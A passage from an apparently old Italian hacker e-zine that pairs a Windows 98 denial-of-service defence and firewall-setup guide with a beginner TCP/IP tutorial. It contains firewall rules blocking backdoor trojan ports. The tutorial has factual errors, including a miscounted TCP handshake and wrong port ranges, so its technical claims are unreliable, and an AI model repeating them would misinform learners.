Avvio -> Impostazioni -> Pannello di controllo -> Modem -> Proprietà modem -> Connessione -> 
Avanzate -> Altre impostazioni : inserire ATS2=255 


ATTENZIONE: Non è possibile proteggersi da attacchi Smurf. 


WINDOWS 98 


E' un sistema operativo immune ai seguenti attacchi: 
O00B 

Land 

Bonk 

Teardrop 


Utilizzare uno o più firewall difende dai seguenti attacchi: 
ICMP Nuke 

Ping Pattern 

Icmp Flood 

Solamente in certi casi SSPing 


Per gli ssping, e gli IGMP nuke è necessario installare una pach apposita. 
I pacchetti IGMP possono essere utilizzati ugualmente per normali attacchi flood, e non mi è 
possibile esserne immune, perchè non ho trovato firewall che filtrano questo tipo di pacchetti. 


Per il SYN Flood bisogna evitare di tenere aperte porte, anche solo per monitoraggio (cosa 
praticamente impossibile). 


Per il Bloop non ho notizie certe, ma probabilmente con un firewall si ovvia al problema. 


Se non ne siete immuni per difendersi dal Ping Patter è sufficente inserire: 
Avvio -> Impostazioni -> Pannello di controllo -> Modem -> Proprietà modem -> Connessione -> 
Avanzate -> Altre impostazioni : inserire ATS2=255 


ATTENZIONE: Non è possibile proteggersi da attacchi Smurf. 


Abbiamo parlato di "Firewall", ma cosa sono, e a cosa servono?? 

Un firewall è un programma che controlla, e filtra i pacchetti e le connessioni in entrata ed 

in uscita dal nostro PC. Con un firewall ben settato possiamo raggiungere un livello di sicurezza 
abbastanza elevato, ma adesso vediamo come settarli: 


NukeNabber 
Questo non è un vero e proprio firewall, ma serve soprattutto per loggare gli attacchi, e le 
connessioni. 
- Andare in File -> Options -> General 
- selezionare "Block portscan" (chiude le porte dopo uno scan) 
- "Disable port for.....": mettere 120 secondi (evita di riaprirle per X secondi). 
- Poi andare in in File -> Options -> Advanced: qui si possono controllare le attivita' di 
monitoring sulle porte. 
- Indicare le seguenti porte: 
NukeNabber di default controlla le seguenti porte: 
- 5001 (tcp), 5000 (tcp), 1080 (tcp), 1032 (tcp), 1029 (tcp), 1027 (tcp) 
- 139 (tcp), 138 (tcp), 137 (tcp): Queste devono restare, ma disinstallando NetBIOS o installando 
WinNuke95 e selezionando "Patch against Nuke", le si puo' togliere. 
- 129 (tcp), ma non e' un servizio standard. 
- 53 (tcp), 
si puo' togliere, a meno di non avere un DNS sul PC, accessibile 
dall'esterno. 
- 19 (udp)Su Windows 95 non c'e' il servizio chargen corrispondente alla porta. 


Su WinNT, va elimitato, dal pannello di controllo "Small TCP Services", perche' si puo' indurre 
NT a cortocircuitare le proprie porte 19 e 53, con risultati non proprio esaltanti. Con Windows 
95/98 no (non c'e' il servizio). 

- Vanno aggiunte invece le seguenti: 

- 31337 (udp), Porta di default del Bo. 

- 61466 (tcp), 50505 (tcp) 

- 12345 (tcp), 12346 (tcp), porte utilizzate da NetBus. 


Si tenga comunque presente che gli scan alla ricerca di backdoor/server vari non sono pericolosi 
in quanto tali. 


PC Conseal Firewall 

Secondo me questo è un'ottimo firewall, è molto semplice da usare, ma il settaggio è molto 
complicato, per questo consiglio di scaricarsi delle rules, cioè dei files di regole su cui 

il Conseal si basa per la difesa. 

Per utilizzare un file rule, caricare il file da: File --> Change Ruleset File... 

A questo punto il firewall funziona correttamente, ma potrebbe esserci utile, per qualche motivo, 
disattivarlo temporaneamente: per farlo andare nel menu "Rules": ci apparirà una finestra, dove 
noi toglieremo la "V" alla casella "Firewall Up" (per riattivarlo, rispuntare la casella). 

In caso che vogliate fare voi un file rules, andare su "Rules" --> "AIl Network device". 


ATGuard 

Anche questo è un ottimo firewall, un po' più complicato da usare del Conseal, ma il settaggio 

è abbastanza semplice. 

Per settarlo andare dal menu avvio su: "Start -> Programmi -> ATGuard -> Settings: 

Si aprirà un programma, andare sulla scheda "Firewall". 

A questo punto abbiamo molte regole gia impostate correttamente, tuttavia consiglio di bloccare 
tutti gli ICMP diretti verso il nostro pc: 


Cliccare su "Default ICMP Inbound", e premere su "Modify.." 

Si aprirà una finestra, e cambiare la casella "Action" da "Permit" a "Block". 

Poi andare sulla scheda "Login "e selezionare la casella "Log an event...matched", e la casella 
"Show notifications..." 


Il computer adesso è difeso dai più comuni attacchi, ma consiglio di bloccare le porte dei troian 
più usati in questo modo: 


Tornare alle rules, cliccare su "Add.." 

Si aprirà una finestra, che noi dovremo impostare nel seguente modo: 

- Name: inserire il nome del troian (Es. Sub7) 

- Action: Block 

- Directions: Inbound 

- Protocol: TCP or UDP 

Nelle schede sotto, selezionare in questo modo: 

- Applications: selezionare Any aplications 

- Services: selezionare a sinistra "Any service", a destra "List of services", dopodichè premere 
su "Add" e scrivere le porte utilizzate dal troian (Es. 1243 e 27374) 

- Addresses: lasciare come di default 

- Time Active: lasciare come di default 

- Loggin: selezionare la casella "Log an event...matched", e la casella "Show notifications..." 
Si noti che le difese contro i troian Netbus e Back Orefice sono gia impostate correttamente. 


Ogni volta che ATGuard rivelerà qualche connessione, o trasmissione di pacchetti non ancora 
impostata chiederà se farla passare sempre, bloccarla sempre o farla passare o bloccare solo per 
quella volta. 


Una volta avviato ATGuard verrà visualizzata una barra in alto sullo schermo, per attivare il 
firewall spuntare la casella "Firewall" e l'ultima casella a sinistra. 
Per visualizzare i log cliccare con il tasto destro sulla barre, ed andare su "Event Log". 
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1 INTRODUZIONE 


Quando leggo gli articoli di BFI provo contemporaneamente meraviglia e 
sgomento. Lo sgomento nasce dal fatto che, in quella e-zine, spesso mi 
mancano le informazioni per poter capire quella massa di dati forniti con 
estrema disinvoltura. 

Lo stesso è avvenuto per l'articolo "Guida newbie all'IP spoofing" che altro 
non era che la seconda parte del progetto "ONOS3NDAi" elucubrata dal pur 
ottimo FuSyS. Lì per i veri newbie c'era ben poco da spolpare. 

Al momento non avevo sottomano la prima parte del progetto e così 
scartabellai libri, manuali, ezines, e quant'altro mi potesse fornire la 
conoscenza per avvicinarmi al livello richiesto da FuSyS. Letture disordinate, 
sul letto o in cucina, nei ritagli di tempo che a volte, invece, arrivavano 

ad inglobare buona parte della giornata. 

Quindi le ho organizzate in piccoli appunti, collegandoli tra loro come 
chiazze d'olio nell'acqua. 

Ma ecco quello che ne è uscito. 


2) LO STACK TCP-IP 


Esiste un'ampia letteratura sui modelli di organizzazione della rete e sulla descrizione dei protocolli 
utilizzati per la trasmissione dei dati. I principali modelli prevedono la suddivisione della rete in 


livelli, ad ognuno dei quali sono associati determinati protocolli di comunicazione. I due modelli di 
suddivisione od organizzazione della rete più noti sono il modello ISO-OSI ed il modello di rete 
TCP-IP. 


2.1 L'architettura di rete 


Il modello di organizzazione ISO-OSI suddivide la rete in sette livelli o 

strati (stack). Nato tra il 1977 e il 1984 ad opera dell'organismo 

internazionale ISO (International Standard Organization), questo modello si 
basa su un procedimento standardizzato per il collegamento dei sistemi, 
chiamato modello standard di riferimento OSI (Open Systems Interconnection). 
La descrizione di questa architettura venne poi chiamata modello di 
organizzazione ISO-OSI. 

Invece, secondo il modello di rete TCP-IP, la rete viene suddivisa in quattro 
strati: lo strato dell'Applicazione (dove opera il software applicativo), 

lo strato del Trasporto, lo strato Internet e lo strato della Rete. 


Il termine protocollo viene usato per indicare un procedimento di 
trasmissione standardizzato dei dati tra le applicazioni di rete. 

I vari protocolli sono caratterizzati dal tipo di dati trasmessi e dalla 
modalità di trasmissione. 

I dati vengono trasmessi in segmenti di byte, chiamati pacchetti. 

Nella manualistica sulle comunicazioni di rete è frequente trovare ancora il 
termine ottetto al posto di byte. L'ottetto, che ha il significato di 

insieme di otto bit, sostituiva la parola byte perché al momento della 
progettazione del protocollo TCP esistevano sistemi con byte formati da nove 
bit. Oggi, pur con la quasi totalità dei sistemi che utilizzano byte di otto 

bit, questo termine viene ancora utilizzato anche se è anacronistico. 
L'organizzazione del modello di rete TCP/IP prevede che i diversi protocolli 
operino nello strato del trasporto, nello strato internet e nello strato 

della rete. Nel livello dell'applicazione, i programmi di rete trasmettono 

i dati al livello del trasporto o di internet utilizzando determinate 

interfacce software, chiamate API socket. 


3 I PROTOCOLLI DI RETE 


A livello dello strato del trasporto operano due protocolli: TCP e UDP. 

Il protocollo TCP (Transport Control Protocol), esegue il trasporto di una 
sequenza di dati a livello dello strato del trasporto utilizzando un flusso 
byte-stream (la spiegazione di byte stream è più avanti). Nello stesso strato 
opera il protocollo UDP, che trasmette i dati mediante l'invio di datagrammi. 
Ad un livello più basso, nello strato della rete operano tre protocolli 

diversi: il protocollo IP, che si occupa di frammentare i dati e di 

trasportare i datagrammi attraverso la rete ed i protocolli ICMP e IGMP, che 
vengono chiamati protocolli di controllo in quanto servono ad inviare dati di 
controllo della connessione. 

Questi protocolli saranno l'oggetto della presente trattazione. 


Come abbiamo già detto, nello strato dell'applicazione operano i programmi di rete. Verranno 
descritte le modalità in cui questi programmi inviano e ricevono i dati, interagendo con lo strato del 
trasporto e utilizzando dei programmi di 

interfaccia (API) che permettono la creazione di una connessione tra due host 

in rete (socket). Saranno definiti i vari tipi di socket e le chiamate alle 

varie funzioni che i programmi effettuano durante l'instaurarsi della 

comunicazione. 


3.1 protocolli del livello di trasporto 
3.1.1 Il protocollo TCP 


REC 793 

In una sessione TCP, tra i due host si stabilisce una connessione 
full-duplex, cioè un trasferimento di dati bidirezionale, in cui l'host 
destinatario conferma il ricevimento dei pacchetti di dati all'host mittente. 
Ma come avviene, in pratica, la connessione con il protocollo TCP? L'host 
client comunica al proprio sistema operativo che intende aprire una sessione 
con l'host server, e pertanto si fa assegnare una porta. L'assegnazione 

viene effettuata dinamicamente dal s.0., con porte casuali i cui numeri 
assumono un valore minimo di 1024 fino a 65.535. 


Per chi non lo sapesse, le porte da 1 a 256 sono definite porte ben note e 
vengono associate ad applicazioni o servizi distinti. 

La descrizione delle porte si trova sotto win nel file C:\windows\services, 
mentre su linux in /etc/services. 


A questo punto, l'host mittente si connette all'indirizzo IP dell'host 

server, specificando il numero di porta dell'applicazione con la quale 
intende comunicare. Ora l'host server, ricevuta la richiesta di apertura 
della sessione, comunica al proprio s.0. che si deve stabilire un'apertura 
passiva della porta, la quale si dice che è in stato d'ascolto. A questo 

punto si è aperta una sessione di comunicazione punto-punto tra i due host. 
Tale sessione viene anche definita circuito virtuale. L'indirizzo IP del 
server, unitamente al protocollo usato per il trasporto ed il numero della 
porta al quale il protocollo si connette, costituisce l'indirizzo socket. 


Prima avevamo detto che TCP invia e riceve i dati utilizzando un flusso 
byte-stream. Ma che significa? Significa che il protocollo trasmette tutti i 
dati come un'unica sequenza di byte, come se le informazioni facessero parte 
di un unico flusso seriale. La trasmissione byte-stream (anche definita a 
flusso di dati), utilizzata da TCP si differenzia dalla trasmissione dei 
protocolli UDP e IP, che segmentano i dati in datagrammi, unità di 
informazioni indipendenti trasmesse non sequenzialmente. 


Il flusso dei dati TCP può essere di due tipi: flusso di massa (ftp, news) e flusso interattivo (telnet, 
rlogin). 

Il meccanismo di trasmissione byte-stream adottato da TCP appare a prima vista più farraginoso ed 
è più lento di quello usato da UDP, ma ha il vantaggio di essere estremamente affidabile perché, a 
differenza di quest'ultimo, TCP si 


assicura che i dati giungano effettivamente all'applicazione ricevente, 

nella sequenza corretta. Inoltre, TCP ha anche il compito di ottimizzare 
l'ampiezza di banda della rete, controllando che il flusso di dati trasmesso 
non sia eccessivo e non mandi in overflow il buffer di dati nell'host di 
destinazione. In questo caso TCP induce l'host mittente a ridurre la velocità 
di trasmissione. 


Ma come fa il protocollo a garantire la ricezione dei pacchetti di dati TCP? 
Per capirlo dobbiamo esaminare com'è fatto un segmento TCP. 
Un segmento di dati TCP può essere diviso in 18 campi. 


1) Porta di origine: tale campo, a 16 bit, definisce la porta di protocollo 
usata dall'applicazione trasmittente. 

2) Porta di destinazione: campo a 16 bit che identifica la porta di 
protocollo dell'applicazione ricevente. 

3) SEQ o numero di sequenza: campo a 32 bit che indica l'ordine di 
riassemblaggio dei segmenti. 

4) Numero di acknowledgment (numero della conferma): campo a 32 bit che 
specifica il numero successivo nella sequenza che l'host ricevente si 
aspetta di ricevere. 

5) Offset dei dati: campo a 4 bit che specifica la lunghezza 
dell'intestazione TCP in parole a 32 bit. 

6) Reserved: è un campo a 6 bit riservato, che verrà utilizzato in impieghi 
futuri; il valore deve essere impostato su 0. 

7) Flag URG (bit del controllo urgente): campo di un bit che, se ha il valore 
impostato a 1, significa che il campo "puntatore urgente" punta a dati 
urgenti. 

8) Flag ACK (Acknowledgment Control Bit o bit del controllo delle conferme): 
campo di un bit che, se ha il valore impostato a 1, significa che il 
numero di acknowledgement è valido e deve essere letto. 

9) Flag PSH (Push Control Bit o bit del controllo di lancio): campo di un 
bit che, se impostato ad 1, il segmento chiede di essere inviato 
immediatamente, senza attendere che l'applicazione riempia il proprio 
buffer di trasmissione. 

10) Flag RST (Reset Control Bit o bit del controllo del reset): campo di un 
bit che, se impostato ad 1, il segmento richiede che la connessione TCP 
sia reinizializzata. 

11) Flag SYN (Syncronize Control Bit o bit del controllo della sintonia): 
campo di un bit che, allo stabilirsi di una sessione TCP, imposta il suo 
valore a 1 e chiede al modulo TCP ricevente di sincronizzare i numeri di 
sequenza. 

12) Flag FIN (Finish Control Bit o bit del controllo di fine invio): campo di 
un bit che, se impostato ad 1, l'host mittente comunica che non vi sono 
più dati da trasmettere. 

13) Dimensione Finestra: campo a 16 bit che indica il numero di ottetti di 
dati che l'host mittente accetterà. Questo numero definisce la grandezza 
delle finestre scorrevoli. 

14) Checksum (somma di controllo): campo a 16 bit che permette al modulo TCP 
ricevente di rilevare eventuali alterazioni sui dati; l'operazione di 
controllo è calcolata tramite una tecnica definita "complemento ad uno". 

15) Puntatore urgente: campo a 16 bit che punta all'ultimo byte di dati 


urgenti nell'area dati TCP. 

16) Opzioni: campo di lunghezza di bit variabile, che può contenere tre 
opzioni diverse anche contemporaneamente; queste sono End of Option 
List=0, No Operation=1, Maximum segment size=2. 

17) Padding (riempitivo): campo che, riempito da una serie di 0, assicura 
che l'intestazione TCP termini al limite dei 32 bit. 

18) Data: i dati reali inclusi nel segmento. 


L'instaurazione di una sessione TCP, detta anche handshacking a tre vie, 

si attiva con l'host mittente che invia il primo segmento con il flag SYN 

impostato ad 1, unitamente ad un numero sequenziale a 32 bit, SEQ, scelto a 

caso. E' da sottolineare, tuttavia, che il numero di sequenza identifica un byte nel flusso di dati e 
rappresenta un valore di spostamento (offset) rispetto al primo segmento inviato, come se fosse un 
contatore. Quindi, i successivi SEQ sono aumentati dell'esatto numero di byte inviati. 


L'host ricevente, se accetta la connessione, invia due segmenti. Il primo è 

in risposta al segmento ricevuto e contiene il flag ACK impostato a 1, 

oltre al numero di acknowledgement. Questo numero viene impostato su prossimo valore di SEQ 
che il server si aspetta di ricevere. Tale conferma instaura una 

connessione TCP in una direzione. 


A sua volta, l'host ricevente trasmette un segmento di dati con il flag SYN 

impostato a 1, e con il proprio numero sequenziale, anche in questo caso 

scelto casualmente. L'host trasmittente trasmetterà a sua volta un messaggio di acknowledgement, 
con il flag ACK impostato a 1 e il numero di acknowledgement uguale al SEQ del server aumentato 
di 1. Ciò crea la comunicazione anche nell'altro senso. 

Questa connessione viene definita full-duplex. I dati che scorrono in una 

direzione sono indipendenti da quelli che scorrono nell'altra. 


Es. di handsnake a tre vie tra l'host client A e l'host server B: 


A-----> SYN 1, SEQ 2616666351 ----- >B Ainvia la richiesta di connessione 
B----- > ACK 1, SEQ 2616666352 ----- > A B conferma ricezione dati 

B----- > SYN 1, SEQ 6465455251 ----- > A B stabilisce connessione altro senso 
A---- > ACK 1, SEQ 6465455252 ----- > B Asisincronizza con B 

A-----> SYN 1, SEQ 2616666352 ----- > B A invia il secondo pacchetto dati 


Nell'instaurarsi della sessione avviene un altro fatto: l'host mittente 
imposta le dimensioni della finestra di trasmissione e lo comunica all'host 
ricevente, che imposta la finestra di ricezione sulle stesse dimensioni. 

Ma cosa indica la dimensione di queste finestre? Essa indica il numero 
massimo di segmenti che si possono inviare ogni volta. In pratica, quando 
l'applicazione posta al livello superiore passa i dati al protocollo TCP, 
questo li suddivide in pacchetti o segmenti. Allo stabilirsi della sessione, 
l'host mittente invia contemporaneamente tanti segmenti quanti ne può 
contenere la finestra di trasmissione. 


Mettiamo che l'host mittente debba inviare 20 segmenti ed imposti la propria 
finestra di trasmissione in modo da inviare quattro segmenti per volta. 
L'host mittente invia i segmenti SYN1, SYN2, SYN3 e SYNA4. L'host ricevente, 


per qualche problema della rete, riceverà solo i pacchetti 1, 2 e 4. 

La risposta dell'host ricevente sarà che ha ricevuto solo i segmenti 1 e 2 e 
trasmetterà i segmenti ACK1 e ACK2. L'host mittente, ricevuta l'informazione 
ritrasmetterà i segmenti SYN3 e SYN4, ma contemporaneamente trasmetterà i 
segmenti SYN5 e SYNE6, riempiendo così la finestra di trasmissione. 

E così via. Questo tipo di trasmissione viene chiamato metodo delle finestre 
scorrevoli o sliding windows. In questo modo, l'host ricevente può inviare 

una sola risposta di conferma per una ricezione di più segmenti 
contemporaneamente. 


Ma come fa l'host mittente a sapere con esattezza quali pacchetti sono giunti 
a destinazione? Inserendo un temporizzatore di ritrasmissione in ogni 
segmento trasmesso. Quando il temporizzatore raggiunge il valore di 0, 
l'host mittente invia nuovamente il segmento, impostando il temporizzatore 
ad una durata doppia di prima. Questo metodo viene usato in quanto l'host 
ricevente può comunicare solo l'avvenuta ricezione dei segmenti e non anche 
il contrario. 


La connessione termina mediante un handsnake a due sensi. In pratica, sia il client che il server, 
possono decidere di terminare la comunicazione, inviando il flag FIN impostato a 1. L'host che 
invia il flag FIN effettua la chiusura attiva della connessione, mentre l'altro host effettua la chiusura 
passiva della connessione TCP. Mettiamo che il client invii FIN. Il server risponderà con un flag 
ACK, che starà ad indicare di avere ricevuto la richiesta di termine della connessione e, 
generalmente, invierà a sua volta un flag FIN, effettuando la chiusura passiva. Ma che cosa succede 
se il server non invia il flag FIN? In questo stato viene ancora mantenuta la connessione nell'altro 
senso. Questo stato di chiusura intermedia viene chiamato Half-Close. E' un evento che avviene 
raramente perché pochissime applicazioni TCP hanno bisogno di utilizzare questo tipo di chiusura. 


Una sessione TCP, pertanto, si può trovare in diverse condizioni, a seconda 
che la sessione stia per iniziare, sia iniziata o terminata. Durante una 
connessione, con il comando netstat -na si possono visualizzare tutti gli 
stati della sessione TCP. Ecco gli stati possibili: 


- LISTEN: l'host attende una richiesta di connessione da parte di qualsiasi 
host remoto; 

- SYN-SENT: l'host che si trova in questo stato, ha inviato una richiesta di 
connessione ad un host ricevente e sta aspettando la richiesta di ritorno 
per instaurare la connessione full-duplex; 

- SYN-RECEIVED: è lo stato dell'host ricevente che ha ricevuto ed inviato a 
sua volta una richiesta di conferma per la connessione e sta aspettando la 
conferma; 

- ESTABLISHED: significa che la connessione tra i due host è aperta; 

- FIN-WAIT1: è lo stato di attesa di una richesta di termine della sessione o 
di una conferma di una richiesta di termine della sessione precedente; 

- FIN-WAIT?2: è lo stato di attesa per una richiesta di termine della sessione 
dall'host remoto; 

- CLOSE-WAIT; stato che rappresenta il lasso di tempo in cui la connessione 
TCP attende la richiesta di termine della sessione da parte 
dell'applicazione posta nel livello superiore dello stack TCP-IP; 

- CLOSING; è lo stato dell'attesa della conferma della richiesta di termine 
della connessione da parte dell'host remoto; 


- LAST-ACK: è lo stato dell'attesa della conferma della richesta di termine 
della connessione che l'host ha inviato all'host remoto; 

- TIME-WAIT: l'host è in attesa di chiudere la connessione, dopo l'invio 
della conferma della sua richiesta di termine della connessione; 

- CLOSED: la connessione tra i due host è terminata. 


3.1.2 Il protocollo UDP 


RFC 768 

E' un protocollo che permette una consegna non garantita, ma più veloce dei dati, trasmessi 
mediante l'invio di datagrammi. Una seconda caratteristica di tale protocollo è che l'host mittente, 
durante la trasmissione dei dati, non deve aprire una sessione con l'host di destinazione. Infatti si 
parla di di comunicazione senza connessione, per distinguerla dalla comunicazione con connessione 
del protocollo TCP. In questo caso il client effettuerà un'apertura attiva della porta, mentre il server 
effettuerà un'apertura passiva, ricevendo i dati senza comunicare l'avvenuta ricezione. La mancanza 
di questo meccanismo di controllo rende meno affidabile, ma sicuramente più veloce, la 
trasmissione dei dati. 


Pertanto, ogni applicazione che voglia utilizzare questo protocollo, come ad es. le applicazioni 
Realaudio, deve occuparsi di ritrasmettere i dati smarriti e di effettuare direttamente il controllo del 
flusso dei dati con un apposito buffer, evitando eventuali congestioni del flusso. Inoltre essa dovrà 
provvedere alla frammentazione e riassemblggio dei dati voluminosi. 

Con UDP è comunque possibile una verifica dell'integrità dei dati trasmessi e viene permesso 
l'invio dei dati in broadcasting e in multicasting, cosa non permessa al protocollo TCP. 


Ma come è fatto il datagramma UDP? Esso è composto da un header di 4 byte, contenente quattro 
campi, e un'area dati. I primi due campi indicano la porta sorgente e la porta destinazione del 
protocollo. Il terzo campo è il message lenght ed indica la lunghezza in byte del datagramma. Il 
campo di checksum o somma di controllo, utilizza la tecnica del complemento ad uno sull'header e 
sui dati per la verifica dell'integrità delle informazioni. L'area dati è di lunghezza variabile e 
contiene i dati che provengono dall'applicazione posta nel livello superiore. 


Nella trasmissione dei dati, l'host mittente non stabilisce una connessione con l'host ricevente, ma 
invia i datagrammi UDP dopo averli incapsulati in un datagramma IP. L'host ricevente, se avrà una 
porta in listening, accetterà il pacchetto eliminando l'incapsulazione IP. L'analisi del datagramma 
UDP permetterà all'host ricevente di verificare le informazioni del datagramma. 

Poiché il volume dei dati inviati tramite il protocollo UDP può essere elevata, i datagrammi UDP 
tendono ad essere frammentati in più pacchetti. Un controllo della velocità può essere effettuato con 
la produzione da parte dell'host server di datagrammi denominati "source quench", che non sono 
altro che ICMP di tipo 4; generalmente, la trasmissione dei dati inizia lentamente, per aumentare 
sempre più finchè il server non risponde con un messaggio soure quench. 


3.2 I protocolli del Livello Internet 


3.2.1 Il protocollo IP 


REC 791 

L'Internet Protocol (IP) è il principale protocollo utilizzato per la trasmissione dei dati in rete. Tutti i 
protocolli provenienti dal livello superiore dello stack, come TCP ed UDP, o provenienti dallo 
stesso livello, come i protocolli di controllo ICMP e IGMP, vengono incapsulati nei datagrammi IP 
e inviati nel livello inferiore, chiamato link layer, pronti per il successivo invio nella rete. 


Il pacchetto IP viene chiamato datagramma. Che cosa significa questo termine? Significa unità di 
dati autocontenente e, solitamente, specifica il tipo di consegna dei dati, per distinguerlo dalla 
trasmissione dei dati byte-stream. Pertanto, si può comprendere che il datagramma IP, pur 
utilizzando lo stesso metodo di trasmissione, è diverso dal datagramma UDP. 

Il datagramma IP contiene uno header e l'area dati. Quest'ultima, a sua volta consiste nel pacchetto 
incapsulato. L'header IP ha la lunghezza fissa di 20 byte. Ma ecco, di seguito, i campi dell'header. 


- Version number (VERS): campo di 4 bit che identifica la versione dell'IP usata per creare il 
datagramma. 

- Header lengh (HLEN): campo di 4 bit che specifica la lunghezza dell'header IP in parole di 32 bit. 
- Type of service (TOS): campo di 8 bit che specifica la priorità di consegna dei dati e le decisioni 
progettuali. Tuttavia, il TOS non viene supportato da parecchi host e router. Questo campo è a sua 
volta suddiviso in 5 sottocampi. Il primo sottocampo (precedence) viene utilizzato dalle 
applicazioni o dai protocolli per specificare l'importanza dei loro dati, mediante un valore che va da 
0 a 7. Sebbene sia utile nel controllo delle congestioni in rete, viene scarsamente utilizzato. Il 
secondo sottocampo (delay), così come gli altri tre, definisce una priorità non generale come il 
primo, ma dipendente dalle applicazioni. Delay indica che si vogliono minimizzare i ritardi. Il terzo 
sottocampo (throughput) indica che si vuole massimizzare il throughput. Il quarto sottocampo 
(reliability) indica che si vuole massimizzare l'affidabilità. L'ultimo sottocampo (cost) indica che si 
vuole massimizzare il costo. 

- Packet length: campo di 16 bit che specifica la lunghezza totale dell'intero pacchetto IP. 

- Identification: campo di 16 bit, utilizzato per l'identificazione del datagramma IP quando questo 
viene frammentato. 

- Flags: campo di 3 bit utilizzato per il controllo della frammentazione. Se l'applicazione intende 
prevenire la frammentazione del datagramma, essa attiva il primo bit del campo. Tuttavia questo 
metodo viene scarsamente utilizzato poiché in caso di una sua attivazione che sia in contrasto con il 
MTU il pacchetto viene distrutto. L'ultimo bit del campo indica "altri frammenti". Questo bit viene 
attivato da IP in tutti i frammenti creati, eccetto l'ultimo frammento, che avrà valore uguale a 0. 

- Fragment offset: campo di 13 bit che indica la distanza o punto di rottura dall'inizio del 
datagramma in caso di frammentazione. Questo valore verrà utilizzato da IP per la ricostruzione dei 
frammenti. Dato che la lunghezza massima di un datagramma è di 65535, questo campo deve 
poter puntare in qualsiasi punto del pacchetto e deve poter contenere valori che vanno da 1 a 65535. 
- Time-to-Live (TTL): campo di 8 bit che indica quanto tempo potrà vivere il pacchetto durante il 
suo viaggio nella rete. Questo campo viene decrementato di un'unità ad ogni passaggio in un router. 
Il router che riceva un pacchetto scaduto prima del suo arrivo a destinazione, lo distruggerà ed 
invierà un pacchetto ICMP di avvertimento all'host mittente. 

- Protocol: campo di 8 bit che indica quale protocollo ha creato il pacchetto trasportato da IP. A 
titolo di esempio, il protocollo ICMP ha valore 1, l'IGMP 2, il TCP 6, mentre UDP 17. 

- Header checksum: campo di 16 bit utilizzato per la verifica dell'integrità dell'header IP. La 
checksum non comprende l'area dati, il cui controllo di integrità viene gestito dal protocollo che ha 
creato il pacchetto. 

- Indirizzi IP di partenza e di arrivo: source IP address è un campo di 32 bit che contiene l'indirizzo 
IP dell'host mittente. Destination IP address è un campo di 32 bit che contiene l'indirizzo IP 
dell'host ricevente. 


- IP options: campo di 8 bit utilizzato per testare e correggere le applicazioni di rete. Questo campo 
è suddiviso in tre sottocampi: copia, classe opzione e numero opzione. Non tutti i router ed host 
supportano l'IP options. 


In rete si indica per MTU il valore di unità massima di trasferimento del pacchetto che si vuol 
trasferire. Quando un programma di rete cerca di inviare un pacchetto più grande della MTU di 
quella rete, esso viene frammentato in più parti. La frammentazione può avvenire anche durante il 
tragitto, se il router ha una MTU di rete più piccola di quella della rete da dove è partito il 
pacchetto. 

Come si è già detto, il riassemblaggio dei pacchetti avviene per mezzo dei tre campi Identification, 
Flags e Fragment Offset. 


3.2.2 Il protocollo di controllo ICMP 


REC 792 

L'internet Control Message Protocol viene definito protocollo di basso 

livello, in quanto opera nello strato della rete, unitamente al protocollo 

IP. Tuttavia, pur operando nello stesso livello, anche ICMP si affida al 
protocollo IP per la trasmissione in rete dei propri pacchetti. 

Tutti i programmi che utilizzano l'ICMP devono creare un'interfaccia software 
particolarmente rudimentale, chiamata socket raw. 


Ma di cosa si occupa questo protocollo? L'ICMP svolge essenzialmente due 

compiti: il primo è di trasportare i messaggi d'errore della rete; il 

secondo è di trasportare i messaggi di richiesta, i quali contengono sia 

richieste di informazione che risposte, relative sia alla rete che all'host. 

La progettazione di ICMP fu resa necessaria dal fatto che il protocollo IP 

non contemplava la possibilità di fornire notifiche di errori nel trasporto 

dei dati. I progettatori decisero di semplificare l'attività di IP e di 

affidare questo compito al nuovo protocollo ICMP, con alcuni limiti. Infatti ICMP non è in grado di 
risolvere i problemi scaturiti durante il trasporto dei dati, e non può comunicare il verificarsi di un 
errore ai router intermedi, ma solo all'host che ha generato il pacchetto. Una particolarità che è utile 
menzionare è che un messaggio di errore non può generare altri messaggi di errore. Ciò evita la 
produzione di messaggi a catena, che provocherebbero le cosiddette "tempeste broadcast). 


Ma ecco la descrizione del pacchetto ICMP. 

L'header ICMP è formato da tre campi, di cui due a 8 bit e il terzo a 16 bit, per un totale di 32 bit. Il 
pacchetto che contiene ICMP comprende inoltre l'header IP con i primi 8 byte di dati del 
datagramma che ha generato l'errore (se si tratta di messaggi di errore) o con i dati contenenti il 
messaggio di richiesta. Ciò avviene perché il pacchetto del protocollo ICMP, per il trasporto nella 
rete, viene incapsulato in un datagramma IP. 


Il primo campo contiene il valore Type ed è di 8 bit. Questo valore indica i 15 tipi diversi di 
messaggio ICMP. 
Il secondo campo contiene il valore Code ed è anch'esso di un byte 


(1 byte= 8 bit). Questo valore contiene i codici o le categorie esistenti 

per ogni messaggio. Ad esempio, l'ICMP di tipo 3 è un messaggio di errore che 
significa destinazione irraggiungibile. Questo messaggio comprende a sua 
volta 16 diverse categorie che contemplano i vari tipi di errore per una 
destinazione irraggiungibile. 

Il terzo campo da 2 byte, contiene il valore Checksum. 


Ma ecco una tabella riassuntiva. 


Tipo 0 messaggio di richiesta descrizione: risposta echo 


Tipo 3 messaggio di errore descrizione: destinazione irraggiungibile 
Tipo 4 messaggio di errore descrizione: estinzione della fonte 
Tipo 5 messaggio di errore descrizione: reindirizzamento 


Tipo 8 messaggio di richiesta descrizione: echo 

Tipo 9 messaggio di richiesta descrizione: annuncio al router 

Tipo 10 messaggio di richiesta descrizione: sollecito al router 

Tipo 11 messaggio di errore descrizione: tempo superato 

Tipo 12 messaggio di errore descrizione: problema dei parametri 

Tipo 13 messaggio di richiesta descrizione: richiesta di un timestamp 
Tipo 14 messaggio di richiesta descrizione: invio di un timestamp 

Tipo 15 messaggio di richiesta descrizione: rich. informazioni (obsoleto) 
Tipo 16 messaggio di richiesta —deccrizione: invio informazioni (obsoleto) 
Tipo 17 messaggio di richiesta descrizione: rich. maschera d'indirizzo 
Tipo 18 messaggio di richiesta descrizione: invio maschera d'indirizzo 


Come si può vedere, ICMP comprende 5 messaggi di errore e 10 messaggi di 
richiesta. Specifichiamo i vari messaggi. 


- MESSAGGI DI ERRORE 
1) errori di destinazione irraggiungibile (tipo 3) 


Lo scopo principale del protocollo ICMP è proprio il messaggio di errore del tipo 3, cioè 
destinazione irraggiungibile. Questa peculiarità di ICMP serve per ovviare al fatto che il protocollo 
IP non garantisce la consegna dei datagrammi. Questo messaggio di errore viene prodotto dal router 
ed inviato all'host sorgente ogni volta che non gli è possibile consegnare il pacchetto dei dati. 
L'impossibilità di consegna dei dati può dipendere da un problema nel trasferimento dei dati o da un 
